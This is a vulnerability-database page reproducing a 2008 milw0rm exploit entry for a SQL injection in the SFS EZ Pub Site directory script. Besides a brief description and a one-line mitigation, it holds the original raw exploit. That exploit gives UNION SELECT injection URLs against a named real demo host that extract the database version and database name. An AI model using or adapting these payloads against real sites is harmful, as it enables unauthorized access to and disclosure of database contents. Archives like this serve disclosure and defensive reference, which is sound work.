header-logo
Suggest Exploit
vendor:
SFS EZ Pub Site
by:
Hakxer
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: SFS EZ Pub Site
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

SQL Injection in SFS EZ Pub Site

A SQL injection vulnerability exists in SFS EZ Pub Site. An attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary SQL commands in the back-end database. This can be exploited to manipulate the content of the database, disclose sensitive information, or even gain access to the underlying system.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

###########################################################################
      ______    __  __   ______          __                ______                   
     / ____/___ \ \/ /  / ____/___  ____/ /__  __________ /_  __/__  ____ _____ ___ 
    / __/ / __ `/\  /  / /   / __ \/ __  / _ \/ ___/ ___/  / / / _ \/ __ `/ __ `__ \
   / /___/ /_/ / / /  / /___/ /_/ / /_/ /  __/ /  (__  )  / / /  __/ /_/ / / / / / /
  /_____/\__, / /_/   \____/\____/\__,_/\___/_/  /____/  /_/  \___/\__,_/_/ /_/ /_/ 
        /____/                                           

# Discovered by : Hakxer
# Type Gap : SQL Injection
# Script : 	SFS EZ Pub Site 
# Greetz : Allah , Egyptian x hacker , Str0ke  :) 
##########################################################################

# [~] Poc : 
http://www.turnkeyzone.com/demos/pubs/directory.php?cat=-9+union+select+1,2,3,4,5,6,7,@@version,9,10,11,12,13,14/*
# [~] Exploit :
http://www.turnkeyzone.com/demos/pubs/directory.php?cat=-9+union+select+1,2,3,4,5,6,7,database(),9,10,11,12,13,14/*
OR
http://www.turnkeyzone.com/demos/pubs/directory.php?cat=-9+union+select+1,2,3,4,5,6,7,@@version,9,10,11,12,13,14/*
		

# Proud To be a Muslim #
#_=END=_#

# milw0rm.com [2008-11-01]

Navigation

Suggest Exploit

Services By CQR